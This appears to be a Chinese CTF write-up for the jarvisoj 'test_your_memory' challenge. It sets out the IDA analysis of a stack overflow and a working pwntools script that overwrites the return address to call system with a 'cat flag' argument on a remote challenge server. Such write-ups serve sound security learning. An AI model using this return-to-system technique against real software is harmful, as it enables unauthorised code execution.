jarvisoj_test_your_memory

文章讲述了在存在栈溢出的情况下,如何通过IDA分析找到溢出点,并构建payload来调用system函数,但由于缺乏/bin/sh,所以使用catflag作为参数。payload设计中包含了对main_addr和flag_addr的调用,以确保程序正常结束并显示hint。整个过程涉及到二进制漏洞利用技术和栈帧结构的知识。
摘要由CSDN通过智能技术生成

1,三连
在这里插入图片描述
2,IDA分析
溢出点:
在这里插入图片描述
偏移:0x13+4

有system,无/bin/sh,但有cat flag
在这里插入图片描述思路:
存在栈溢出,可以进行溢出调用system
没有/bin/sh,但是存在cat flag,同样可以用作system的参数。
需要正常结束程序(执行cat flag后hint中才有内容),所以调用system之后再调用main打印hint,即flag

3,payload

from pwn import *
context.log_level = 'debug'

# r = process("./memory")
r = remote("node4.buuoj.cn",28765)
elf = ELF("./memory")

flag_addr = 0x80487E0
system_addr = elf.symbols['system']
main_addr = elf.symbols['main']

payload = b'M'*(0x13+4) + p32(system_addr) + p32(main_addr) + p32(flag_addr)
r.sendline(payload)

r.interactive()

payload栈帧结构:

flag_addr(ret1的参数)
---------
main_addr(ret2)
------------
system_addr (ret1)
-----
bbbb
------
bbbb

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值